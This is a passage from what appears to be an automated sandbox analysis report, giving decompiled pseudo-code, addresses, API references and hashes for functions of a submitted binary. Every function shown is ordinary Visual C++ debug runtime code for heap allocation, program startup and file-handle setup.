										_t102 = L00418C90(1, 0, 0, 0, "%s", "Error: memory allocation: bad memory block type.\n");
										_t178 = _t178 + 0x18;
										__eflags = _t102 - 1;
										if(_t102 == 1) {
											asm("int3");
										}
									}
								}
							}
						}
						 *((intOrPtr*)(_t175 - 0x2c)) =  *((intOrPtr*)(_t175 + 8)) + 0x24;
						_t80 = E00418BD0(_t116, _t171, _t173,  *((intOrPtr*)(_t175 - 0x2c))); // executed
						 *(_t175 - 0x24) = _t80;
						__eflags =  *(_t175 - 0x24);
						if( *(_t175 - 0x24) != 0) {
							_t122 =  *0x4bb4e0; // 0x34
							_t123 = _t122 + 1;
							 *0x4bb4e0 = _t123;
							__eflags =  *(_t175 - 0x1c);
							if( *(_t175 - 0x1c) == 0) {
								__eflags = (_t123 | 0xffffffff) -  *0x4e34f4 -  *((intOrPtr*)(_t175 + 8));
								if((_t123 | 0xffffffff) -  *0x4e34f4 <=  *((intOrPtr*)(_t175 + 8))) {
									 *0x4e34f4 = 0xffffffff;
								} else {
									_t159 =  *0x4e34f4; // 0x38e2
									 *0x4e34f4 = _t159 +  *((intOrPtr*)(_t175 + 8));
								}
								_t81 =  *0x4e350c; // 0x2016
								 *0x4e350c = _t81 +  *((intOrPtr*)(_t175 + 8));
								_t126 =  *0x4e350c; // 0x2016
								__eflags = _t126 -  *0x4e3500; // 0x263a
								if(__eflags > 0) {
									_t158 =  *0x4e350c; // 0x2016
									 *0x4e3500 = _t158;
								}
								__eflags =  *0x4e3504;
								if( *0x4e3504 == 0) {
									 *0x4e34f8 =  *(_t175 - 0x24);
								} else {
									_t97 =  *0x4e3504; // 0x4f18f8
									 *(_t97 + 4) =  *(_t175 - 0x24);
								}
								_t127 =  *0x4e3504; // 0x4f18f8
								 *( *(_t175 - 0x24)) = _t127;
								 *( *(_t175 - 0x24) + 4) = 0;
								 *( *(_t175 - 0x24) + 8) =  *(_t175 + 0x10);
								 *((intOrPtr*)( *(_t175 - 0x24) + 0xc)) =  *((intOrPtr*)(_t175 + 0x14));
								 *((intOrPtr*)( *(_t175 - 0x24) + 0x10)) =  *((intOrPtr*)(_t175 + 8));
								 *( *(_t175 - 0x24) + 0x14) =  *(_t175 + 0xc);
								 *( *(_t175 - 0x24) + 0x18) =  *(_t175 - 0x28);
								 *0x4e3504 =  *(_t175 - 0x24);
							} else {
								 *( *(_t175 - 0x24)) = 0;
								 *( *(_t175 - 0x24) + 4) = 0;
								 *( *(_t175 - 0x24) + 8) = 0;
								 *((intOrPtr*)( *(_t175 - 0x24) + 0xc)) = 0xfedcbabc;
								 *((intOrPtr*)( *(_t175 - 0x24) + 0x10)) =  *((intOrPtr*)(_t175 + 8));
								 *( *(_t175 - 0x24) + 0x14) = 3;
								 *( *(_t175 - 0x24) + 0x18) = 0;
							}
							E004116E0(_t171,  *(_t175 - 0x24) + 0x1c,  *0x4bb4e8 & 0x000000ff, 4);
							E004116E0(_t171,  *(_t175 - 0x24) +  *((intOrPtr*)(_t175 + 8)) + 0x20,  *0x4bb4e8 & 0x000000ff, 4);
							E004116E0(_t171,  *(_t175 - 0x24) + 0x20,  *0x4bb4eb & 0x000000ff,  *((intOrPtr*)(_t175 + 8)));
							_t157 =  *(_t175 - 0x24) + 0x20;
							__eflags = _t157;
							 *(_t175 - 0x20) = _t157;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x18)))) = 0xc;
						}
					} else {
						_t103 = L00418C90(1, 0, 0, 0, "Invalid allocation size: %Iu bytes.\n",  *((intOrPtr*)(_t175 + 8)));
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							asm("int3");
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x18)))) = 0xc;
					}
					L46:
					 *(_t175 - 4) = 0xfffffffe;
					E0040EA40();
					 *[fs:0x0] =  *((intOrPtr*)(_t175 - 0x10));
					return  *(_t175 - 0x20);
				}
				_t109 =  *0x4bb7a0(1, 0,  *((intOrPtr*)(_t175 + 8)),  *(_t175 + 0xc),  *(_t175 - 0x28),  *(_t175 + 0x10),  *((intOrPtr*)(_t175 + 0x14)));
				_t178 = _t178 + 0x1c;
				if(_t109 != 0) {
					goto L19;
				}
				if( *(_t175 + 0x10) == 0) {
					_t110 = L00418C90(0, 0, 0, 0, "%s", "Client hook allocation failure.\n");
					__eflags = _t110 - 1;
					if(_t110 == 1) {
						asm("int3");
					}
					L18:
					goto L46;
				}
				_push( *((intOrPtr*)(_t175 + 0x14)));
				if(L00418C90(0, 0, 0, 0, "Client hook allocation failure at file %hs line %d.\n",  *(_t175 + 0x10)) == 1) {
					asm("int3");
				}
				goto L18;
			}

0x0040e6f7
0x0040e6fa
0x0040e708
0x0040e70a
0x0040e712
0x0040e718
0x0040e750
0x0040e756
0x0040e756
0x0040e759
0x0040e71a
0x0040e721
0x0040e723
0x0040e728
0x0040e72a
0x0040e72f
0x0040e734
0x0040e736
0x0040e73b
0x0040e741
0x0040e743
0x0040e743
0x0040e741
0x0040e744
0x0040e744
0x0040e718
0x0040e75f
0x0040e764
0x0040e76e
0x0040e773
0x0040e779
0x0040e77b
0x0040e77b
0x0040e779
0x0040e783
0x0040e7fa
0x0040e803
0x0040e806
0x0040e808
0x0040e80d
0x0040e810
0x0040e812
0x0040e812
0x0040e810
0x0040e819
0x0040e81d
0x0040e855
0x0040e858
0x0040e85a
0x0040e85e
0x0040e869
0x0040e86c
0x0040e86e
0x0040e872
0x0040e886
0x0040e88b
0x0040e88e
0x0040e891
0x0040e893
0x0040e893
0x0040e891
0x0040e872
0x0040e86c
0x0040e85e
0x0040e89a
0x0040e8a1
0x0040e8a9
0x0040e8ac
0x0040e8b0
0x0040e8c0
0x0040e8c6
0x0040e8c9
0x0040e8cf
0x0040e8d3
0x0040e927
0x0040e92a
0x0040e93d
0x0040e92c
0x0040e92c
0x0040e935
0x0040e935
0x0040e947
0x0040e94f
0x0040e954
0x0040e95a
0x0040e960
0x0040e962
0x0040e968
0x0040e968
0x0040e96e
0x0040e975
0x0040e987
0x0040e977
0x0040e977
0x0040e97f
0x0040e97f
0x0040e990
0x0040e996
0x0040e99b
0x0040e9a8
0x0040e9b1
0x0040e9ba
0x0040e9c3
0x0040e9cc
0x0040e9d2
0x0040e8d5
0x0040e8d8
0x0040e8e1
0x0040e8eb
0x0040e8f5
0x0040e902
0x0040e908
0x0040e912
0x0040e912
0x0040e9e9
0x0040ea06
0x0040ea21
0x0040ea2c
0x0040ea2c
0x0040ea2f
0x0040e8b2
0x0040e8b5
0x0040e8b5
0x0040e81f
0x0040e830
0x0040e838
0x0040e83b
0x0040e83d
0x0040e83d
0x0040e841
0x0040e841
0x0040ea32
0x0040ea32
0x0040ea39
0x0040ea51
0x0040ea5f
0x0040ea5f
0x0040e79d
0x0040e7a3
0x0040e7a8
0x00000000
0x00000000
0x0040e7ae
0x0040e7e7
0x0040e7ef
0x0040e7f2
0x0040e7f4
0x0040e7f4
0x0040e7f5
0x00000000
0x0040e7f5
0x0040e7b3
0x0040e7d0
0x0040e7d2
0x0040e7d2
0x00000000

APIs

__CrtCheckMemory.LIBCMTD ref: 0040E71A
__heap_alloc_base.LIBCMTD ref: 0040E8A1
_memset.LIBCMT ref: 0040E9E9
_memset.LIBCMT ref: 0040EA06
_memset.LIBCMT ref: 0040EA21

Strings

Client hook allocation failure., xrefs: 0040E7D5
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040E72F
Invalid allocation size: %Iu bytes., xrefs: 0040E823
_CrtCheckMemory(), xrefs: 0040E723
Error: memory allocation: bad memory block type., xrefs: 0040E874
Client hook allocation failure at file %hs line %d., xrefs: 0040E7B8

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: _memset$CheckMemory__heap_alloc_base
String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Error: memory allocation: bad memory block type.$Invalid allocation size: %Iu bytes.$_CrtCheckMemory()$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
API String ID: 4254127243-2462871736
Opcode ID: 198e3576d2f3fd942da96ae8b112660d676705cadd1501dd529000518194d079
Instruction ID: 19e58b901e55618ba548cea9b3ee33c1ee4b3505421fd6aeccad87d4c231e564
Opcode Fuzzy Hash: 198e3576d2f3fd942da96ae8b112660d676705cadd1501dd529000518194d079
Instruction Fuzzy Hash: 6BA1AEB0A00204DFDB24CF45D985BAA77F1FB48304F24866AE5146B3D2D379AE51CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA45 Relevance: 15.1, APIs: 10, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E0040DA45() {
				void* _t21;
				void* _t22;
				void* _t25;
				intOrPtr _t27;
				void* _t29;
				intOrPtr _t30;
				intOrPtr _t32;
				intOrPtr _t34;
				void* _t44;
				void* _t46;
				void* _t54;
				void* _t56;
				void* _t58;
				void* _t60;
				void* _t61;
				void* _t62;

				 *((intOrPtr*)(_t58 - 4)) = 0xfffffffe;
				 *((intOrPtr*)(_t58 - 0x6c)) = E0040DBE0();
				_t21 = E004178E0(_t46, 1); // executed
				_t61 = _t60 + 4;
				if(_t21 == 0) {
					E0040DBB0(_t44, _t54, _t56, 0x1c);
					_t61 = _t61 + 4; // executed
				}
				_t22 = L00411E00(_t46); // executed
				if(_t22 == 0) {
					E0040DBB0(_t44, _t54, _t56, 0x10);
					_t61 = _t61 + 4;
				}
				_push(1);
				E004108D0(_t46);
				_t62 = _t61 + 4;
				E00415620();
				 *((intOrPtr*)(_t58 - 4)) = 1;
				_t25 = E00417420(); // executed
				if(_t25 < 0) {
					L0040D3E0(_t46, 0x1b);
					_t62 = _t62 + 4;
				}
				 *0x4e5204 = E00417410(); // executed
				_t27 = E00417360(_t44, _t54, _t56); // executed
				 *0x4e34e8 = _t27;
				if(E00416F70() < 0) {
					L0040D3E0(_t46, 8);
					_t62 = _t62 + 4; // executed
				}
				_t29 = E00416DD0(_t44, _t54, _t56); // executed
				if(_t29 < 0) {
					L0040D3E0(_t46, 9);
					_t62 = _t62 + 4;
				}
				_t30 = E0040D2C0(_t46, 1); // executed
				 *((intOrPtr*)(_t58 - 0x64)) = _t30;
				if( *((intOrPtr*)(_t58 - 0x64)) != 0) {
					L0040D3E0( *((intOrPtr*)(_t58 - 0x64)),  *((intOrPtr*)(_t58 - 0x64)));
				}
				 *((intOrPtr*)(_t58 - 0x68)) = E00416D30();
				if(( *(_t58 - 0x34) & 0x00000001) == 0) {
					 *(_t58 - 0x7c) = 0xa;
				} else {
					 *(_t58 - 0x7c) =  *(_t58 - 0x30) & 0x0000ffff;
				}
				_push( *(_t58 - 0x7c));
				_push( *((intOrPtr*)(_t58 - 0x68)));
				_push(0);
				_t32 = E0040A321(_t44, _t54, 0x400000); // executed
				 *((intOrPtr*)(_t58 - 0x70)) = _t32;
				if( *((intOrPtr*)(_t58 - 0x6c)) == 0) {
					E0040D360( *((intOrPtr*)(_t58 - 0x70)));
				}
				E0040D3A0();
				 *((intOrPtr*)(_t58 - 4)) = 0xfffffffe;
				_t34 =  *((intOrPtr*)(_t58 - 0x70));
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0x10));
				return _t34;
			}

0x0040da45
0x0040da51
0x0040da56
0x0040da5b
0x0040da60
0x0040da64
0x0040da69
0x0040da69
0x0040da6c
0x0040da73
0x0040da77
0x0040da7c
0x0040da7c
0x0040da7f
0x0040da81
0x0040da86
0x0040da89
0x0040da8e
0x0040da95
0x0040da9c
0x0040daa0
0x0040daa5
0x0040daa5
0x0040daad
0x0040dab2
0x0040dab7
0x0040dac3
0x0040dac7
0x0040dacc
0x0040dacc
0x0040dacf
0x0040dad6
0x0040dada
0x0040dadf
0x0040dadf
0x0040dae4
0x0040daec
0x0040daf3
0x0040daf9
0x0040dafe
0x0040db06
0x0040db0f
0x0040db1a
0x0040db11
0x0040db15
0x0040db15
0x0040db24
0x0040db28
0x0040db29
0x0040db30
0x0040db35
0x0040db3c
0x0040db42
0x0040db42
0x0040db47
0x0040db4c
0x0040db94
0x0040db9a
0x0040dba8

APIs

_check_managed_app.LIBCMTD ref: 0040DA4C
__heap_init.LIBCMTD ref: 0040DA56

Part of subcall function 004178E0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,0040DA5B,00000001), ref: 004178F6

_fast_error_exit.LIBCMTD ref: 0040DA64

Part of subcall function 0040DBB0: ___crtExitProcess.LIBCMTD ref: 0040DBD4

_fast_error_exit.LIBCMTD ref: 0040DA77
__RTC_Initialize.LIBCMTD ref: 0040DA89
___crtGetEnvironmentStringsW.LIBCMTD ref: 0040DAB2
___wsetargv.LIBCMTD ref: 0040DABC
__wsetenvp.LIBCMTD ref: 0040DACF
__cinit.LIBCMTD ref: 0040DAE4
__wwincmdln.LIBCMTD ref: 0040DB01

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: ___crt_fast_error_exit$CreateEnvironmentExitHeapInitializeProcessStrings___wsetargv__cinit__heap_init__wsetenvp__wwincmdln_check_managed_app
String ID:
API String ID: 3184702096-0
Opcode ID: 161c39cc3ae4b36db94f4ea927589aff2fb16522ae3f68cc996ce3fa1532166b
Instruction ID: d828f0cf3645c6d9bc96d8479a8bb43b62cc98171dc053810bdb27b9b49b144e
Opcode Fuzzy Hash: 161c39cc3ae4b36db94f4ea927589aff2fb16522ae3f68cc996ce3fa1532166b
Instruction Fuzzy Hash: 163144B1E043049AEB10BBF2A94379E7670AF4035CF10413EE9057B2C2F679A549CB5B

Uniqueness

Uniqueness Score: -1.00%

Function 00417420 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 326
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00417420() {
				void* _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				struct _STARTUPINFOA _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				int _v116;
				signed char* _v120;
				void* _v124;
				void** _v128;
				void** _v132;
				int _v140;
				long _v144;
				signed int _t166;
				signed int _t170;
				signed int _t175;
				signed int _t188;
				signed int _t206;
				void** _t209;
				signed int _t321;
				void* _t322;
				intOrPtr _t323;
				void* _t324;

				_push(0xfffffffe);
				_push(0x4278a8);
				_push(E00411150);
				_push( *[fs:0x0]);
				_t323 = _t322 + 0xffffff84;
				_t166 =  *0x4bb4ec; // 0x2588ab5e
				_v12 = _v12 ^ _t166;
				_push(_t166 ^ _t321);
				 *[fs:0x0] =  &_v20;
				_v28 = _t323;
				_v8 = 0;
				GetStartupInfoA( &_v100);
				_v8 = 0xfffffffe;
				_t170 = L0040EB30(0x20, 0x40, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\ioinit.c", 0x88); // executed
				_t324 = _t323 + 0x14;
				_v128 = _t170;
				if(_v128 != 0) {
					 *0x4e40e0 = _v128;
					 *0x4e40cc = 0x20;
					while(_v128 <  *0x4e40e0 + 0x800) {
						_v128[1] = 0;
						 *_v128 = 0xffffffff;
						_v128[1] = 0xa;
						_v128[2] = 0;
						_v128[9] = _v128[9] & 0x00000080;
						_v128[9] = _v128[9] & 0x0000007f;
						_v128[9] = 0xa;
						_v128[9] = 0xa;
						_v128[0xe] = 0;
						_v128[0xd] = 0;
						_v128 =  &(_v128[0x10]);
					}
					if((_v100.cbReserved2 & 0x0000ffff) == 0 || _v100.lpReserved2 == 0) {
						L34:
						_v112 = 0;
						while(_v112 < 3) {
							_v128 = (_v112 << 6) +  *0x4e40e0;
							if( *_v128 == 0xffffffff ||  *_v128 == 0xfffffffe) {
								_v128[1] = 0x81;
								if(_v112 != 0) {
									asm("sbb edx, edx");
									_v144 =  ~(_v112 - 1) + 0xfffffff5;
								} else {
									_v144 = 0xfffffff6;
								}
								_v124 = GetStdHandle(_v144);
								if(_v124 == 0xffffffff || _v124 == 0) {
									L52:
									_v128[1] = _v128[1] | 0x00000040;
									 *_v128 = 0xfffffffe;
									goto L53;
								} else {
									_v108 = GetFileType(_v124);
									if(_v108 == 0) {
										goto L52;
									} else {
										 *_v128 = _v124;
										if((_v108 & 0x000000ff) != 2) {
											if((_v108 & 0x000000ff) == 3) {
												_v128[1] = _v128[1] | 0x00000008;
											}
										} else {
											_v128[1] = _v128[1] | 0x00000040;
										}
										_t188 = E00416B10( &(_v128[3]), 0xfa0);
										_t324 = _t324 + 8;
										if(_t188 != 0) {
											_v128[2] = _v128[2] + 1;
											L53:
											goto L55;
										} else {
											_t175 = _t188 | 0xffffffff;
										}
									}
								}
							} else {
								_v128[1] = _v128[1] | 0x00000080;
								L55:
								_v112 = _v112 + 1;
								continue;
							}
							goto L57;
						}
						SetHandleCount( *0x4e40cc);
						_t175 = 0;
					} else {
						_v116 =  *(_v100.lpReserved2);
						_v120 = _v100.lpReserved2 + 4;
						_v132 =  &(_v120[_v116]);
						if(_v116 >= 0x800) {
							_v140 = 0x800;
						} else {
							_v140 = _v116;
						}
						_v116 = _v140;
						_v104 = 1;
						while( *0x4e40cc < _v116) {
							_t209 = L0040EB30(0x20, 0x40, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\ioinit.c", 0xc0);
							_t324 = _t324 + 0x14;
							_v128 = _t209;
							if(_v128 != 0) {
								 *((intOrPtr*)(0x4e40e0 + _v104 * 4)) = _v128;
								 *0x4e40cc =  *0x4e40cc + 0x20;
								while(_v128 <  *((intOrPtr*)(0x4e40e0 + _v104 * 4)) + 0x800) {
									_v128[1] = 0;
									 *_v128 = 0xffffffff;
									_v128[1] = 0xa;
									_v128[2] = 0;
									_v128[9] = _v128[9] & 0x00000080;
									_v128[9] = 0xa;
									_v128[9] = 0xa;
									_v128[0xe] = 0;
									_v128[0xd] = 0;
									_v128 =  &(_v128[0x10]);
								}
								_v104 = _v104 + 1;
								continue;
							} else {
								_v116 =  *0x4e40cc;
							}
							break;
						}
						_v112 = 0;
						while(_v112 < _v116) {
							if( *_v132 == 0xffffffff ||  *_v132 == 0xfffffffe || ( *_v120 & 0x00000001) == 0 || ( *_v120 & 0x00000008) == 0 && GetFileType( *_v132) == 0) {
								L33:
								_v112 = _v112 + 1;
								_v120 =  &(_v120[1]);
								_v132 =  &(_v132[1]);
								continue;
							} else {
								_v128 = ((_v112 & 0x0000001f) << 6) +  *((intOrPtr*)(0x4e40e0 + (_v112 >> 5) * 4));
								 *_v128 =  *_v132;
								_v128[1] =  *_v120;
								_t206 = E00416B10( &(_v128[3]), 0xfa0);
								_t324 = _t324 + 8;
								if(_t206 != 0) {
									_v128[2] =  *((intOrPtr*)(_v128 + 8)) + 1;
									goto L33;
								} else {
									_t175 = _t206 | 0xffffffff;
								}
							}
							goto L57;
						}
						goto L34;
					}
				} else {
					_t175 = _t170 | 0xffffffff;
				}
				L57:
				 *[fs:0x0] = _v20;
				return _t175;
			}

0x00417425
0x00417427
0x0041742c
0x00417437
0x00417438
0x0041743e
0x00417443
0x00417448
0x0041744c
0x00417452
0x00417455
0x00417460
0x00417466
0x004174ab
0x004174b0
0x004174b3
0x004174ba
0x004174c7
0x004174cd
0x004174e2
0x004174f4
0x004174fb
0x00417504
0x0041750b
0x0041751d
0x0041752b
0x00417531
0x00417538
0x0041753f
0x00417549
0x004174df
0x004174df
0x00417555
0x00417753
0x00417753
0x00417765
0x0041777b
0x00417784
0x00417795
0x0041779d
0x004177b3
0x004177b8
0x0041779f
0x0041779f
0x0041779f
0x004177cb
0x004177d2
0x00417869
0x00417876
0x0041787c
0x00000000
0x004177e2
0x004177ec
0x004177f3
0x00000000
0x004177f5
0x004177fb
0x00417809
0x00417829
0x00417838
0x00417838
0x0041780b
0x00417818
0x00417818
0x00417847
0x0041784c
0x00417851
0x00417864
0x00417882
0x00000000
0x00417853
0x00417853
0x00417853
0x00417851
0x004177f3
0x00417884
0x00417893
0x00417896
0x00417762
0x00000000
0x00417762
0x00000000
0x00417784
0x004178a2
0x004178a8
0x00417565
0x0041756a
0x00417573
0x0041757c
0x00417586
0x00417593
0x00417588
0x0041758b
0x0041758b
0x004175a3
0x004175a6
0x004175b8
0x004175d7
0x004175dc
0x004175df
0x004175e6
0x004175fb
0x0041760a
0x0041761a
0x00417631
0x00417638
0x00417641
0x00417648
0x0041765a
0x00417660
0x00417667
0x0041766e
0x00417678
0x00417617
0x00417617
0x004175b5
0x00000000
0x004175e8
0x004175ed
0x004175ed
0x00000000
0x004175e6
0x00417683
0x004176a7
0x004176b9
0x0041774e
0x00417692
0x0041769b
0x004176a4
0x00000000
0x004176f1
0x00417707
0x00417712
0x0041771c
0x0041772b
0x00417730
0x00417735
0x0041774b
0x00000000
0x00417737
0x00417737
0x00417737
0x00417735
0x00000000
0x004176b9
0x00000000
0x004176a7
0x004174bc
0x004174bc
0x004174bc
0x004178aa
0x004178ad
0x004178bb

APIs

GetStartupInfoA.KERNEL32(?), ref: 00417460
GetFileType.KERNEL32(?), ref: 004176E7

Strings

f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c, xrefs: 004174A0, 004175CC

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: FileInfoStartupType
String ID: f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c
API String ID: 3016745765-4097262939
Opcode ID: d14d4aa6455f1964d0b729ce39618abd5d4ae7c6a944663095e8280c6a09fb52
Instruction ID: 7d8e79c651a91b6beb172c19de325eefff3ffc9aa48fe28bfbbb586fde54fdc3
Opcode Fuzzy Hash: d14d4aa6455f1964d0b729ce39618abd5d4ae7c6a944663095e8280c6a09fb52
Instruction Fuzzy Hash: 43E1F874E08249CFDB24CFA8C894B9DBBB1BB49314F24C26ED4656B392C734A842CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA6E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E0040EA6E(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t25;
				intOrPtr _t28;
				intOrPtr _t29;
				void* _t34;
				void* _t35;
				void* _t36;
				intOrPtr _t38;
				void* _t46;
				void* _t47;
				void* _t48;
				void* _t50;

				_t47 = __esi;
				_t46 = __edi;
				_t36 = __ecx;
				_t35 = __ebx;
				asm("sbb eax, eax");
				_t25 = 0xffffffe0 /  *(_t48 + 8) + 1;
				 *((intOrPtr*)(_t48 - 8)) = _t25;
				if(_t25 == 0) {
					_push(L"(_HEAP_MAXREQ / nNum) >= nSize");
					_push(0);
					_push(0x248);
					_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgheap.c");
					_push(2);
					_t34 = L0040C820();
					_t50 = _t50 + 0x14;
					if(_t34 == 1) {
						asm("int3");
					}
				}
				if( *((intOrPtr*)(_t48 - 8)) != 0) {
					 *(_t48 + 0xc) =  *(_t48 + 0xc) *  *(_t48 + 8);
					_t38 =  *0x4e3c28; // 0x0
					_t28 = L0040E640(_t38,  *(_t48 + 0xc), _t38,  *((intOrPtr*)(_t48 + 0x10)),  *((intOrPtr*)(_t48 + 0x14)),  *((intOrPtr*)(_t48 + 0x18)),  *((intOrPtr*)(_t48 + 0x1c))); // executed
					 *((intOrPtr*)(_t48 - 4)) = _t28;
					if( *((intOrPtr*)(_t48 - 4)) != 0) {
						E004116E0(_t46,  *((intOrPtr*)(_t48 - 4)), 0,  *(_t48 + 0xc));
					}
					_t29 =  *((intOrPtr*)(_t48 - 4));
				} else {
					 *((intOrPtr*)(L00411810(_t36))) = 0xc;
					E0040C660(_t35, _t36, _t46, _t47, L"(_HEAP_MAXREQ / nNum) >= nSize", L"_calloc_dbg_impl", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgheap.c", 0x248, 0);
					_t29 = 0;
				}
				return _t29;
			}

0x0040ea6e
0x0040ea6e
0x0040ea6e
0x0040ea6e
0x0040ea7b
0x0040ea7d
0x0040ea80
0x0040ea83
0x0040ea85
0x0040ea8a
0x0040ea8c
0x0040ea91
0x0040ea96
0x0040ea98
0x0040ea9d
0x0040eaa3
0x0040eaa5
0x0040eaa5
0x0040eaa3
0x0040eaaa
0x0040eae0
0x0040eaf3
0x0040eafe
0x0040eb06
0x0040eb0d
0x0040eb19
0x0040eb1e
0x0040eb21
0x0040eaac
0x0040eab1
0x0040eacd
0x0040ead5
0x0040ead5
0x0040eb27

APIs

__invalid_parameter.LIBCMTD ref: 0040EACD
_memset.LIBCMT ref: 0040EB19

Strings

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040EA91, 0040EABE
_calloc_dbg_impl, xrefs: 0040EAC3
(_HEAP_MAXREQ / nNum) >= nSize, xrefs: 0040EA85, 0040EAC8

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: __invalid_parameter_memset
String ID: (_HEAP_MAXREQ / nNum) >= nSize$_calloc_dbg_impl$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
API String ID: 3961059608-1805389939
Opcode ID: 518550169f4a59baa5537ce5659af4b9649f56f5656407cf900de208e3c7ea9d
Instruction ID: 960f9f5765082772a2ef3c61073022d43484e40e40517655178d2a9106108b99
Opcode Fuzzy Hash: 518550169f4a59baa5537ce5659af4b9649f56f5656407cf900de208e3c7ea9d
Instruction Fuzzy Hash: CD11E971B40208FBDB14DF95CD46F9E3364AB58704F14892AF909BB2C1D678EA508B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E65F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040E65F(intOrPtr __eax, void* __ecx) {
				intOrPtr _t20;
				void* _t27;

				L0:
				while(1) {
					L0:
					 *((intOrPtr*)(_t27 - 4)) = __eax;
					if( *((intOrPtr*)(_t27 - 4)) != 0) {
						break;
					}
					L3:
					if( *((intOrPtr*)(_t27 + 0xc)) != 0) {
						L5:
						if(E00413F70(__ecx,  *((intOrPtr*)(_t27 + 8))) != 0) {
							L7:
							L1:
							L0040E6B0( *((intOrPtr*)(_t27 + 8)),  *((intOrPtr*)(_t27 + 0x10)),  *((intOrPtr*)(_t27 + 0x14)),  *((intOrPtr*)(_t27 + 0x18)),  *((intOrPtr*)(_t27 + 0x1c)));
							continue;
						} else {
							L6:
							 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x1c)))) = 0xc;
							_t20 = 0;
						}
					} else {
						L4:
						 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x1c)))) = 0xc;
						_t20 =  *((intOrPtr*)(_t27 - 4));
					}
					L8:
					return _t20;
					L9:
				}
				L2:
				_t20 =  *((intOrPtr*)(_t27 - 4));
				goto L8;
			}

0x0040e65f
0x0040e65f
0x0040e65f
0x0040e662
0x0040e669
0x00000000
0x00000000
0x0040e670
0x0040e674
0x0040e684
0x0040e692
0x0040e6a1
0x0040e646
0x0040e65a
0x00000000
0x0040e694
0x0040e694
0x0040e697
0x0040e69d
